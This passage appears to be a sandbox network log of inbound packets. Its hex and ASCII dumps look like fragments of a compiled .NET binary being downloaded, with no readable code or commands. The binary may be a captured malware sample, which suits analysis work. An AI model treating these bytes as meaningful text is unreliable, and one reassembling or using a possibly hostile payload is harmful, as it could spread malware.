2023-11-18 09:02:34 UTC	113	IN	Data Raw: cc 83 00 70 6f 23 03 00 0a 7e 1c 03 00 04 72 d8 83 00 70 72 e6 83 00 70 6f 23 03 00 0a 7e 1c 03 00 04 72 ee 83 00 70 72 e6 83 00 70 6f 23 03 00 0a 7e 1c 03 00 04 72 fa 83 00 70 72 04 84 00 70 6f 23 03 00 0a 7e 1c 03 00 04 72 14 84 00 70 72 1c 84 00 70 6f 23 03 00 0a 7e 23 03 00 04 7e 3c 00 00 0a 28 66 00 00 0a 2c 27 14 0c 14 0d 16 13 04 12 02 12 03 12 04 28 65 05 00 06 26 08 09 11 04 7f 22 03 00 04 7f 23 03 00 04 28 6a 05 00 06 26 de 0a 07 2c 06 06 28 60 00 00 0a dc 2a 00 00 41 34 00 00 02 00 00 00 0d 00 00 00 20 00 00 00 2d 00 00 00 0a 00 00 00 00 00 00 00 02 00 00 00 52 00 00 00 01 02 00 00 53 02 00 00 0a 00 00 00 00 00 00 00 5e 02 2c 0d 03 2c 08 02 03 28 75 01 00 0a 2a 02 2a 03 2c 02 03 2a 14 2a 1b 30 02 00 29 00 00 00 5c 00 00 11 7e 1a 03 00 04 0a 16 Data Ascii: po#~rprpo#~rprpo#~rprpo#~rprpo#~#~<(f,'(e&"#(j&,(`A4 -RS^,,(u,*0)\~
2023-11-18 09:02:34 UTC	117	IN	Data Raw: 00 0b 00 27 32 00 03 4c 00 00 02 02 00 0b 00 2a 35 00 07 00 00 00 00 1e 02 7b 25 03 00 04 2a 46 02 7b 38 03 00 0a 7e 3c 00 00 0a 28 66 00 00 0a 2a 56 02 28 33 06 00 06 02 03 7d 26 03 00 04 02 04 28 39 03 00 0a 2a 1b 30 02 00 38 00 00 00 12 00 00 11 02 7c 38 03 00 0a 7e 3c 00 00 0a 28 3b 03 00 0a 0a 06 7e 3c 00 00 0a 28 3d 00 00 0a 2c 0c 02 7b 26 03 00 04 06 28 54 01 00 06 de 0a 26 de 07 02 28 be 00 00 0a dc 17 2a 01 1c 00 00 00 00 00 00 2c 2c 00 03 4c 00 00 02 02 00 00 00 2f 2f 00 07 00 00 00 00 56 02 28 38 06 00 06 02 03 7d 27 03 00 04 02 04 28 39 03 00 0a 2a 00 00 1b 30 02 00 38 00 00 00 12 00 00 11 02 7c 38 03 00 0a 7e 3c 00 00 0a 28 3b 03 00 0a 0a 06 7e 3c 00 00 0a 28 3d 00 00 0a 2c 0c 02 7b 27 03 00 04 06 28 52 01 00 06 de 0a 26 de 07 02 28 be 00 00 Data Ascii: '2L5{%F{8~<(fV(3}&(908\|8~<(;~<(=,{&(T&(,,L//V(8}'(908\|8~<(;~<(=,{'(R&(
2023-11-18 09:02:34 UTC	118	IN	Data Raw: ff 00 00 11 7e 3a 03 00 04 0a 16 0b 06 12 01 28 5f 00 00 0a 7e 46 03 00 04 39 9d 00 00 00 16 0c 7e 46 03 00 04 6f 2f 03 00 0a 0d 2b 41 12 03 28 30 03 00 0a 13 04 12 04 28 38 01 00 0a 13 05 11 05 28 6f 00 00 0a 2d 26 00 11 05 14 28 4d 03 00 0a de 17 13 06 72 6e 90 00 70 11 05 11 06 28 4e 03 00 0a 28 3d 01 00 0a de 00 08 17 58 0c 12 03 28 32 03 00 0a 2d b6 de 0e 12 03 fe 16 4e 00 00 1b 6f 45 00 00 0a dc 72 d0 90 00 70 08 8c b5 00 00 01 28 6f 01 00 0a 6f 4f 03 00 0a 8c b5 00 00 01 28 4e 03 00 0a 28 3d 01 00 0a 7e 46 03 00 04 6f 50 03 00 0a 14 80 46 03 00 04 de 0a 07 2c 06 06 28 60 00 00 0a dc 2a 01 28 00 00 00 00 45 00 0a 4f 00 17 32 00 00 01 02 00 27 00 4e 75 00 0e 00 00 00 00 02 00 08 00 b1 b9 00 0a 00 00 00 00 13 30 03 00 58 00 00 00 00 01 00 11 28 6f 01 Data Ascii: ~:(_~F9~Fo/+A(0(8(o-&(Mrnp(N(=X(2-NoErp(ooO(N(=~FoPF,(`*(EO2'Nu0X(o
2023-11-18 09:02:34 UTC	122	IN	Data Raw: 00 00 0a 2c 0c 07 28 f8 06 00 06 7e 3c 00 00 0a 0b dc 06 2a 00 00 00 41 1c 00 00 02 00 00 00 1f 00 00 00 07 01 00 00 26 01 00 00 75 00 00 00 00 00 00 00 13 30 03 00 ed 00 00 00 08 01 00 11 02 7e 3c 00 00 0a 28 66 00 00 0a 2c 01 2a 16 0a 06 1a 28 5c 00 00 0a 28 0b 07 00 06 0a 02 06 28 0f 07 00 06 0b 06 0c 06 28 5c 00 00 0a 1a 28 0b 07 00 06 0a 06 1a 28 5c 00 00 0a 28 0b 07 00 06 0a 02 06 28 0f 07 00 06 0d 06 13 04 06 28 5c 00 00 0a 28 5c 00 00 0a 28 0b 07 00 06 0a 02 06 28 0f 07 00 06 13 05 06 13 06 11 05 7e 3c 00 00 0a 28 3d 00 00 0a 2c 18 11 05 28 f8 06 00 06 7e 3c 00 00 0a 13 05 02 11 06 11 05 28 13 07 00 06 09 7e 3c 00 00 0a 28 3d 00 00 0a 2c 15 09 28 f8 06 00 06 7e 3c 00 00 0a 0d 02 11 04 09 28 13 07 00 06 07 7e 3c 00 00 0a 28 3d 00 00 0a 2c 14 07 28 Data Ascii: ,(~<A&u0~<(f,(\(((\((\(((\(\((~<(=,(~<(~<(=,(~<(~<(=,(
2023-11-18 09:02:34 UTC	126	IN	Data Raw: fe 07 73 06 00 06 73 01 09 00 06 7d 39 04 00 04 38 fa 01 00 00 02 7c 88 03 00 04 02 fe 06 42 07 00 06 73 ad 08 00 06 7d 24 04 00 04 02 7c 88 03 00 04 02 fe 06 43 07 00 06 73 b1 08 00 06 7d 25 04 00 04 02 7c 88 03 00 04 02 fe 06 44 07 00 06 73 b5 08 00 06 7d 26 04 00 04 02 7c 88 03 00 04 02 fe 06 45 07 00 06 73 b9 08 00 06 7d 27 04 00 04 02 7c 88 03 00 04 02 fe 06 46 07 00 06 73 bd 08 00 06 7d 28 04 00 04 02 7c 88 03 00 04 02 fe 06 47 07 00 06 73 c1 08 00 06 7d 29 04 00 04 02 7c 88 03 00 04 02 fe 06 48 07 00 06 73 c5 08 00 06 7d 2a 04 00 04 02 7c 88 03 00 04 02 fe 06 49 07 00 06 73 c9 08 00 06 7d 2b 04 00 04 02 7c 88 03 00 04 02 fe 06 4a 07 00 06 73 cd 08 00 06 7d 2c 04 00 04 02 7c 88 03 00 04 02 fe 06 4b 07 00 06 73 d1 08 00 06 7d 2d 04 00 04 02 7c 88 03 Data Ascii: ss}98\|Bs}$\|Cs}%\|Ds}&\|Es}'\|Fs}(\|Gs})\|Hs}*\|Is}+\|Js},\|Ks}-\|
2023-11-18 09:02:34 UTC	129	IN	Data Raw: 00 00 0a 2c 0d 02 06 6f 27 07 00 06 7e 3c 00 00 0a 0a dc 06 2a 00 00 00 01 10 00 00 02 00 19 00 2c 45 00 1e 00 00 00 00 8e 28 71 00 00 0a 72 df 95 00 70 18 8d 1c 00 00 01 25 16 03 8c b5 00 00 01 a2 25 17 04 a2 28 40 05 00 06 2a 13 30 04 00 35 00 00 00 18 01 00 11 03 2d 09 05 72 ef 95 00 70 51 17 2a 03 7b 41 01 00 04 0a 06 2d 09 05 72 15 96 00 70 51 17 2a 04 2d 09 05 72 51 96 00 70 51 17 2a 06 02 04 05 6f 2b 01 00 06 2a 00 00 00 13 30 05 00 2d 00 00 00 18 01 00 11 03 2d 0a 0e 04 72 ef 95 00 70 51 17 2a 03 7b 41 01 00 04 0a 06 2d 0a 0e 04 72 15 96 00 70 51 17 2a 06 02 04 05 0e 04 6f 2c 01 00 06 2a 1e 02 7b 8e 03 00 04 2a 22 02 03 7d 8e 03 00 04 2a 1e 02 7b 8f 03 00 04 2a 22 02 03 7d 8f 03 00 04 2a 56 02 03 02 6f 31 07 00 06 02 6f 33 07 00 06 04 28 1d 07 00 Data Ascii: ,o'~<,E(qrp%%(@05-rpQ{A-rpQ-rQpQo+0--rpQ{A-rpQo,{"}{"}*Vo1o3(
2023-11-18 09:02:34 UTC	134	IN	Data Raw: 00 06 02 72 4d 99 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 5b 99 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 6b 99 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 7f 99 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 95 99 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 a5 99 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 af 99 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 bb 99 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 c9 99 00 70 6f a1 07 00 06 2a 62 02 28 b9 07 00 06 02 02 72 d3 99 00 70 6f a1 07 00 06 6f 9f 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 db 99 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 e9 99 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 02 72 54 57 00 70 6f a1 07 00 06 2a 4a 02 28 b9 07 00 06 Data Ascii: rMpoJ(r[poJ(rkpoJ(rpoJ(rpoJ(rpoJ(rpoJ(rpoJ(rpob(rpooJ(rpoJ(rpoJ(rTWpo*J(
2023-11-18 09:02:34 UTC	138	IN	Data Raw: 02 00 11 00 00 00 00 00 00 00 02 16 28 1e 08 00 06 de 07 02 28 14 00 00 0a dc 2a 00 00 00 01 10 00 00 02 00 00 00 09 09 00 07 00 00 00 00 5e 02 03 04 17 28 e4 07 00 06 02 05 7d c5 03 00 04 02 28 22 08 00 06 2a 7a 02 7b c6 03 00 04 7e 3c 00 00 0a 28 66 00 00 0a 2c 0b 72 37 a0 00 70 73 bd 00 00 0a 7a 2a 00 13 30 03 00 40 00 00 00 08 00 00 11 02 7b c6 03 00 04 7e 3c 00 00 0a 28 3d 00 00 0a 2c 01 2a 02 28 e7 07 00 06 02 7b c5 03 00 04 28 fa 06 00 06 02 7c c6 03 00 04 28 07 06 00 06 0a 06 2c 0c 06 72 5f a0 00 70 73 01 04 00 06 7a 2a 13 30 03 00 43 00 00 00 00 00 00 00 02 03 7d c8 03 00 04 02 04 7d c9 03 00 04 03 2d 11 02 7b c7 03 00 04 2c 07 02 14 7d c7 03 00 04 14 2a 02 7b c7 03 00 04 2d 12 02 02 fe 06 26 08 00 06 73 9d 08 00 06 7d c7 03 00 04 02 7b c7 03 00 Data Ascii: ((^(}("z{~<(f,r7psz0@{~<(=,({(\|(,r_psz0C}}-{,}{-&s}{
2023-11-18 09:02:34 UTC	142	IN	Data Raw: 16 0d 02 7b db 03 00 04 6f f0 07 00 06 12 00 12 03 12 01 12 02 28 14 06 00 06 13 04 11 04 2c 0d 11 04 72 9d a4 00 70 73 01 04 00 06 7a 02 06 28 fd 06 00 06 7d dc 03 00 04 02 09 73 83 02 00 0a 7d dd 03 00 04 02 07 73 90 03 00 0a 7d de 03 00 04 02 08 16 fe 03 73 6c 00 00 0a 7d df 03 00 04 2a 13 30 04 00 74 00 00 00 36 01 00 11 02 7b e0 03 00 04 2d 6b 02 28 6b 08 00 06 7e 3c 00 00 0a 0a 16 0b 02 7b db 03 00 04 6f f0 07 00 06 12 00 12 01 28 15 06 00 06 0c 08 2c 0c 08 72 c5 a4 00 70 73 01 04 00 06 7a 06 07 28 06 07 00 06 0d 09 2c 2e 02 07 8d b3 00 00 01 7d e0 03 00 04 16 13 04 2b 16 02 7b e0 03 00 04 11 04 09 11 04 91 16 fe 03 9c 11 04 17 58 13 04 11 04 09 8e 69 32 e3 2a 13 30 02 00 44 00 00 00 34 00 00 11 02 7c e1 03 00 04 28 9c 00 00 0a 2d 36 02 28 6b 08 00 Data Ascii: {o(,rpsz(}s}s}sl}0t6{-k(k~<{o(,rpsz(,.}+{Xi20D4\|(-6(k
2023-11-18 09:02:34 UTC	146	IN	Data Raw: 0e 00 5c 84 a7 78 12 00 a3 73 dd 9e 06 00 5a 95 a4 72 06 00 92 83 7f 16 0e 00 c7 c0 a7 78 0a 00 9a 01 b9 1f 0a 00 6a 4f ca 65 06 00 0b 4d bc 73 06 00 4f 33 09 9f 06 00 f4 76 99 6a 0a 00 1d 90 ca 65 0a 00 62 4b ca 65 0a 00 75 4e ca 65 06 00 fc 83 99 6a 06 00 a6 33 99 6a 06 00 9f 2c 99 6a 06 00 73 01 b9 1f 06 00 cb 01 b9 1f 06 00 bf 01 b9 1f 0a 00 5f 4e ca 65 06 00 b0 01 99 6a 0e 00 ed 9a a7 78 06 00 6f 7a a4 72 7f 00 8f 74 00 00 1f 02 41 8f 00 00 0a 00 ee 73 f0 25 0e 00 b4 76 a7 78 06 00 59 33 b9 72 06 00 b4 7a b9 72 06 00 ee b8 b9 72 06 00 d6 72 a4 9e 06 00 37 4c a4 9e 06 00 e0 55 a4 9e 06 00 72 98 bc 73 06 00 d6 83 99 6a 06 00 19 4c a4 9e 06 00 6d 71 99 6a 06 00 2a 7a bc 73 06 00 ff 4b a4 9e 06 00 06 a3 a4 9e 06 00 9a 3f bc 73 06 00 c0 76 bc 73 06 00 44 Data Ascii: \xsZrxjOeMsO3vjebKeuNej3j,js_NejxozrtAs%vxY3rzrrr7LUrsjLmqj*zsK?svsD
2023-11-18 09:02:34 UTC	149	IN	Data Raw: 00 04 8d 08 03 01 00 00 7a 61 00 00 6d 00 03 04 94 08 03 01 00 00 ab 5e 00 00 6d 00 03 04 98 08 05 01 10 00 02 40 00 00 71 00 03 04 9c 08 0b 01 10 00 04 7f 00 00 ad 00 08 04 9d 08 05 01 00 00 9d 45 00 00 d9 00 09 04 9d 08 0d 01 10 00 73 16 00 00 ad 00 18 04 9d 08 05 01 00 00 a7 8a 00 00 6d 00 23 04 9d 08 05 01 00 00 f7 a9 00 00 6d 00 23 04 a1 08 05 01 00 00 f7 b6 00 00 6d 00 23 04 a5 08 05 01 00 00 1a b7 00 00 6d 00 23 04 a9 08 02 01 00 00 5b 48 00 00 6d 00 23 04 ad 08 02 01 00 00 7a a9 00 00 6d 00 23 04 b1 08 02 01 00 00 41 bb 00 00 6d 00 23 04 b5 08 02 01 00 00 97 a9 00 00 6d 00 23 04 b9 08 02 01 00 00 c5 bf 00 00 6d 00 23 04 bd 08 02 01 00 00 f5 6d 00 00 6d 00 23 04 c1 08 02 01 00 00 be 47 00 00 6d 00 23 04 c5 08 02 01 00 00 b6 8a 00 00 6d 00 23 04 c9 Data Ascii: zam^m@qEsm#m#m#m#[Hm#zm#Am#m#m#mm#Gm#m#
2023-11-18 09:02:34 UTC	153	IN	Data Raw: 80 af 49 e6 2e 56 80 f9 22 e6 2e 56 80 10 6a e6 2e 56 80 da a2 e6 2e 56 80 4f 62 e6 2e 56 80 2a 62 e6 2e 56 80 9b 47 e6 2e 56 80 8b 47 e6 2e 56 80 bd 6d e6 2e 56 80 68 53 e6 2e 56 80 67 62 e6 2e 56 80 96 7b e6 2e 56 80 d5 62 e6 2e 56 80 08 ae e6 2e 56 80 ee 7b e6 2e 56 80 e6 5c e6 2e 56 80 0a 5d e6 2e 56 80 82 2e e6 2e 56 80 a5 5d e6 2e 56 80 77 1f e6 2e 56 80 8a 1f e6 2e 56 80 61 1f e6 2e 56 80 46 1a e6 2e 56 80 5e 91 e6 2e 56 80 90 30 e6 2e 56 80 9e 1c e6 2e 56 80 3c c0 e6 2e 56 80 c1 b3 e6 2e 56 80 a5 b5 e6 2e 56 80 01 8c e6 2e 56 80 14 8c e6 2e 56 80 8d 5c e6 2e 56 80 f8 5c e6 2e 56 80 af 64 e6 2e 56 80 eb 62 e6 2e 56 80 ba 1c e6 2e 56 80 b1 2b e6 2e 56 80 5b ba e6 2e 56 80 2a c0 e6 2e 56 80 93 62 e6 2e 56 80 e1 61 e6 2e 56 80 ca 25 e6 2e 56 80 d5 ac Data Ascii: I.V".Vj.V.VOb.Vb.VG.VG.Vm.VhS.Vgb.V{.Vb.V.V{.V\.V].V..V].Vw.V.Va.VF.V^.V0.V.V<.V.V.V.V.V\.V\.Vd.Vb.V.V+.V[.V.Vb.Va.V%.V
2023-11-18 09:02:34 UTC	158	IN	Data Raw: 00 00 00 00 c3 02 6d 1d 3e 34 68 00 54 3a 00 00 00 00 c3 02 8d 67 4a 34 6c 00 9c 3a 00 00 00 00 c3 02 e6 b2 54 34 6f 00 00 3b 00 00 00 00 c3 02 ad 3d 5d 34 71 00 74 3b 00 00 00 00 c3 02 c0 ba 67 34 74 00 e2 3b 00 00 00 00 c3 02 00 b3 71 34 77 00 f4 3b 00 00 00 00 c3 02 da 3d 78 34 78 00 36 3c 00 00 00 00 c3 02 ab c2 80 34 7a 00 4c 3c 00 00 00 00 c3 02 50 43 8a 34 7c 00 c0 3c 00 00 00 00 c3 02 d0 ba 96 34 7f 00 f8 3c 00 00 00 00 c3 02 64 3d 78 34 81 00 20 3d 00 00 00 00 c3 02 82 3c 78 34 83 00 48 3d 00 00 00 00 c3 02 35 39 78 34 85 00 70 3d 00 00 00 00 c3 02 49 b5 9e 34 87 00 9c 3d 00 00 00 00 c3 02 51 1a a4 34 89 00 3c 3e 00 00 00 00 c3 02 34 a9 b6 34 92 00 d3 3e 00 00 00 00 c3 02 24 34 be 34 94 00 e6 3e 00 00 00 00 c3 02 de 6c c6 34 96 00 fb 3e 00 00 00 Data Ascii: m>4hT:gJ4l:T4o;=]4qt;g4t;q4w;=x4x6<4zL<PC4\|<4<d=x4 =<x4H=59x4p=I4=Q4<>44>$44>l4>
2023-11-18 09:02:34 UTC	162	IN	Data Raw: 00 00 00 c6 08 c5 b5 01 00 c0 02 7b 74 00 00 00 00 c6 08 63 42 b9 37 c1 02 84 74 00 00 00 00 c6 08 73 42 bf 37 c1 02 96 74 00 00 00 00 c4 00 03 8a c6 37 c2 02 9e 74 00 00 00 00 86 00 23 8a cc 37 c2 02 ac 74 00 00 00 00 86 08 a8 74 d2 37 c2 02 bc 74 00 00 00 00 86 08 b7 74 63 37 c2 02 1d 75 00 00 00 00 c4 08 c6 74 d7 37 c3 02 25 75 00 00 00 00 c4 08 d7 74 4c 06 c3 02 33 75 00 00 00 00 86 08 a9 a1 dd 37 c4 02 41 75 00 00 00 00 c4 08 17 74 e3 37 c4 02 49 75 00 00 00 00 86 08 f4 72 e9 37 c4 02 58 75 00 00 00 00 86 08 04 73 ef 37 c4 02 cd 75 00 00 00 00 c4 08 23 73 f6 37 c5 02 d5 75 00 00 00 00 c4 08 35 73 fc 37 c5 02 e4 75 00 00 00 00 86 00 19 bf 06 00 c6 02 e4 76 00 00 00 00 81 00 9f 83 06 00 c6 02 73 77 00 00 00 00 c4 00 f2 82 5d 07 c6 02 7c 77 00 00 00 00 Data Ascii: {tcB7tsB7t7t#7tt7ttc7ut7%utL3u7Aut7Iur7Xus7u#s7u5s7uvsw]\|w
2023-11-18 09:02:34 UTC	166	IN	Data Raw: 00 00 86 08 26 c2 68 39 17 04 e1 eb 00 00 00 00 86 08 2f c2 68 39 18 04 14 ec 00 00 00 00 86 08 6f a3 6f 39 19 04 67 ec 00 00 00 00 86 08 7c a3 6f 39 1a 04 9c ec 00 00 00 00 86 08 22 54 76 39 1b 04 e9 ec 00 00 00 00 86 08 30 54 76 39 1c 04 1c ed 00 00 00 00 86 08 3a 48 7d 39 1d 04 69 ed 00 00 00 00 86 08 45 48 7d 39 1e 04 9c ed 00 00 00 00 81 00 94 61 b7 3b 1f 04 48 ee 00 00 00 00 81 00 df 60 bf 3b 21 04 f0 ee 00 00 00 00 81 00 b2 60 c6 3b 22 04 b8 ef 00 00 00 00 81 00 d4 5e d4 3b 28 04 48 f0 00 00 00 00 86 08 7c ac 84 39 2d 04 95 f0 00 00 00 00 86 08 87 ac 84 39 2e 04 c8 f0 00 00 00 00 86 08 11 2b 8b 39 2f 04 15 f1 00 00 00 00 86 08 1b 2b 8b 39 30 04 48 f1 00 00 00 00 81 00 8e 5e dd 3b 31 04 d4 f1 00 00 00 00 86 08 4c 5e c5 16 33 04 21 f2 00 00 00 00 86 Data Ascii: &h9/h9oo9g\|o9"Tv90Tv9:H}9iEH}9a;H`;!`;"^;(H\|9-9.+9/+90H^;1L^3!
2023-11-18 09:02:34 UTC	170	IN	Data Raw: 00 c6 00 f2 96 26 16 b5 05 e4 32 01 00 00 00 c6 00 44 82 06 09 ba 05 9c 33 01 00 00 00 c6 00 08 a1 30 16 bb 05 94 34 01 00 00 00 c6 00 5c 3b fd 02 c0 05 e8 34 01 00 00 00 c6 00 6b 40 3a 16 c1 05 a0 35 01 00 00 00 c6 00 15 65 41 16 c2 05 84 36 01 00 00 00 c6 00 24 34 48 16 c3 05 3b 37 01 00 00 00 86 00 75 c2 65 3f c4 05 7a 37 01 00 00 00 c6 00 4e 42 c6 12 c5 05 bc 37 01 00 00 00 c6 00 af a8 4d 16 c6 05 7c 38 01 00 00 00 c6 00 d2 26 52 16 c7 05 68 39 01 00 00 00 c6 00 aa 0b 59 16 c8 05 20 3a 01 00 00 00 c6 00 7a 04 10 0c c9 05 d8 3a 01 00 00 00 c6 00 ab 08 39 0c ca 05 90 3b 01 00 00 00 c6 00 28 3f fd 02 cb 05 e0 3b 01 00 00 00 86 00 95 3c fd 02 cc 05 30 3c 01 00 00 00 86 00 8a 39 fd 02 cd 05 80 3c 01 00 00 00 86 00 77 3d fd 02 ce 05 d0 3c 01 00 00 00 c6 00 Data Ascii: &2D304\;4k@:5eA6$4H;7ue?z7NB7M\|8&Rh9Y :z:9;(?;<0<9<w=<
2023-11-18 09:02:34 UTC	174	IN	Data Raw: c6 00 3e a7 10 00 5d 07 3e 8d 01 00 00 00 c6 00 3e a7 01 00 5e 07 53 8d 01 00 00 00 c4 00 70 8a 23 17 5f 07 63 8d 01 00 00 00 c4 00 70 8a 14 17 61 07 7e 8d 01 00 00 00 83 00 2d 29 06 00 63 07 88 8d 01 00 00 00 83 00 da a1 d6 42 63 07 14 8f 01 00 00 00 83 18 e8 8f dd 42 64 07 f1 8f 01 00 00 00 e6 01 ee 47 06 00 69 07 00 90 01 00 00 00 81 00 b1 24 06 00 69 07 20 90 01 00 00 00 81 00 ee 47 15 00 69 07 78 90 01 00 00 00 c4 00 ff 53 06 00 6a 07 a8 90 01 00 00 00 83 00 cc 93 ec 42 6a 07 e0 90 01 00 00 00 83 00 43 8a f4 42 6c 07 68 91 01 00 00 00 83 00 cb a1 06 00 6e 07 a4 91 01 00 00 00 91 00 2d 75 fc 42 6e 07 e4 91 01 00 00 00 81 00 70 5f 04 43 6f 07 ec 92 01 00 00 00 81 00 15 8a ce 42 72 07 4d 97 01 00 00 00 83 08 c5 9f 0e 43 74 07 58 97 01 00 00 00 83 00 63 Data Ascii: >]>>^Sp#_cpa~-)cBcBdGi$i GixSjBjCBlhn-uBnp_CoBrMCtXc
2023-11-18 09:02:34 UTC	178	IN	Data Raw: 00 30 35 43 01 9f 09 60 b9 01 00 00 00 c6 08 c4 26 43 01 9f 09 b8 b8 01 00 00 00 96 08 48 ac 9c 47 9f 09 e8 b9 01 00 00 00 83 18 e8 8f 94 47 a0 09 e0 b8 01 00 00 00 81 18 e8 8f 06 00 a2 09 00 ba 01 00 00 00 c4 00 30 35 43 01 a2 09 60 b9 01 00 00 00 c6 08 c4 26 43 01 a2 09 b8 b8 01 00 00 00 96 08 48 ac a3 47 a2 09 60 ba 01 00 00 00 83 18 e8 8f 94 47 a3 09 e0 b8 01 00 00 00 81 18 e8 8f 06 00 a5 09 78 ba 01 00 00 00 c4 00 30 35 43 01 a5 09 60 b9 01 00 00 00 c6 08 c4 26 43 01 a5 09 a4 80 00 00 00 00 83 18 e8 8f 06 00 a5 09 d8 ba 01 00 00 00 93 08 25 85 aa 47 a5 09 04 bb 01 00 00 00 93 08 d8 45 cc 01 a5 09 0b bb 01 00 00 00 93 08 e4 45 b0 47 a5 09 13 bb 01 00 00 00 93 08 2b 96 40 13 a6 09 29 bb 01 00 00 00 93 08 5c 92 40 13 a6 09 3f bb 01 00 00 00 93 08 37 9f Data Ascii: 05C`&CHGG05C`&CHG`Gx05C`&C%GEEG+@)\@?7
2023-11-18 09:02:34 UTC	181	IN	Data Raw: 02 37 4d 4a a3 0a 1c de 01 00 00 00 81 00 af 37 61 19 a4 0a 29 de 01 00 00 00 81 00 54 37 52 4a a5 0a 38 de 01 00 00 00 81 00 54 37 58 4a a5 0a 7c e2 01 00 00 00 81 00 7d 37 61 4a a6 0a 94 e6 01 00 00 00 81 00 6a a9 6a 4a a7 0a 60 e7 01 00 00 00 81 00 83 a9 79 4a ae 0a 24 e8 01 00 00 00 91 00 a9 8c 81 4a b0 0a 6c e9 01 00 00 00 91 00 a9 8c 8c 4a b5 0a a0 e9 01 00 00 00 91 00 27 8d 81 4a ba 0a e0 e9 01 00 00 00 91 00 27 8d 99 4a bf 0a ba 8a 01 00 00 00 c4 01 7e 69 a6 4a c4 0a 13 ea 01 00 00 00 c4 01 67 69 a6 4a c4 0a 1b ea 01 00 00 00 c4 01 7b 31 e5 02 c4 0a 34 ea 01 00 00 00 c4 01 e1 31 61 19 c4 0a 8b ea 01 00 00 00 c4 01 5b 31 61 19 c5 0a 9c ea 01 00 00 00 c4 01 ab 8d e5 02 c6 0a b2 ea 01 00 00 00 c4 01 87 8d 61 19 c6 0a ba ea 01 00 00 00 91 00 ba 8d ac Data Ascii: 7MJ7a)T7RJ8T7XJ\|}7aJjjJ`yJ$JlJ'J'J~iJgiJ{141a[1aa
2023-11-18 09:02:34 UTC	183	IN	Data Raw: 00 00 c6 00 7b a9 64 49 94 0b 42 fd 01 00 00 00 c6 00 42 bb 75 49 99 0b 55 fd 01 00 00 00 c6 00 98 a9 81 49 9b 0b 68 fd 01 00 00 00 c6 00 c6 bf 81 49 9c 0b 7b fd 01 00 00 00 c6 00 00 6e 8a 49 9d 0b 8e fd 01 00 00 00 c6 00 ca 47 97 49 9f 0b a1 fd 01 00 00 00 c6 00 b7 8a a0 49 a0 0b b4 fd 01 00 00 00 c6 00 55 b7 97 49 a4 0b c7 fd 01 00 00 00 c6 00 bf 55 af 49 a5 0b e0 fd 01 00 00 00 c6 00 1e 6f b6 49 a6 0b f3 fd 01 00 00 00 c6 00 a6 21 c3 49 a9 0b 06 fe 01 00 00 00 c6 00 54 48 ce 49 ab 0b 19 fe 01 00 00 00 c6 00 7f 6e 81 49 ae 0b 2c fe 01 00 00 00 c6 00 15 20 81 49 af 0b 3f fe 01 00 00 00 c6 00 a5 ac 81 49 b0 0b 52 fe 01 00 00 00 c6 00 10 62 81 49 b1 0b 65 fe 01 00 00 00 c6 00 b1 75 dd 49 b2 0b 7e fe 01 00 00 00 c6 00 c5 3f ec 49 b7 0b 91 fe 01 00 00 00 c6 Data Ascii: {dIBBuIUIhI{nIGIIUIUIoI!ITHInI, I?IRbIeuI~?I
2023-11-18 09:02:34 UTC	187	IN	Data Raw: 00 c6 01 e9 30 3a 35 19 0d 00 00 00 00 03 00 c6 01 e4 30 fb 3b 1a 0d 00 00 00 00 03 00 c6 01 da 30 31 3c 1d 0d 00 00 00 00 03 00 86 18 e8 8f 1c 07 1e 0d 00 00 00 00 03 00 c6 01 e9 30 22 48 20 0d 00 00 00 00 03 00 c6 01 e4 30 9a 4d 23 0d 00 00 00 00 03 00 c6 01 da 30 a5 4d 28 0d 00 00 00 00 03 00 86 18 e8 8f 1c 07 29 0d 00 00 00 00 03 00 c6 01 e9 30 2b 48 2b 0d 00 00 00 00 03 00 c6 01 e4 30 de 4d 2d 0d 00 00 00 00 03 00 c6 01 da 30 e9 4d 31 0d 00 00 00 00 03 00 86 18 e8 8f 1c 07 33 0d 00 00 00 00 03 00 c6 01 e9 30 34 48 35 0d 00 00 00 00 03 00 c6 01 e4 30 f3 4d 39 0d 00 00 00 00 03 00 c6 01 da 30 e9 4d 3f 0d 00 00 00 00 03 00 86 18 e8 8f 1c 07 41 0d 00 00 00 00 03 00 c6 01 e9 30 07 48 43 0d 00 00 00 00 03 00 c6 01 e4 30 fb 3b 44 0d 00 00 00 00 03 00 c6 01 Data Ascii: 0:50;01<0"H 0M#0M()0+H+0M-0M1304H50M90M?A0HC0;D
2023-11-18 09:02:34 UTC	191	IN	Data Raw: 00 00 01 00 3c 46 00 00 02 00 53 33 00 00 03 00 25 6f 00 00 04 00 c5 b9 00 00 05 00 50 41 00 00 06 00 c2 2b 00 00 07 00 ec 67 00 00 08 00 e9 bd 00 00 09 00 59 ae 00 00 01 00 57 47 00 00 02 00 a7 bb 00 00 03 00 25 6f 00 00 04 00 79 2e 00 00 05 00 ee 8c 00 00 06 00 e7 2b 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 01 00 03 ae 00 00 02 00 a7 bb 00 00 03 00 00 ac 00 00 04 Data Ascii: <FS3%oPA+gYWG%oy.+
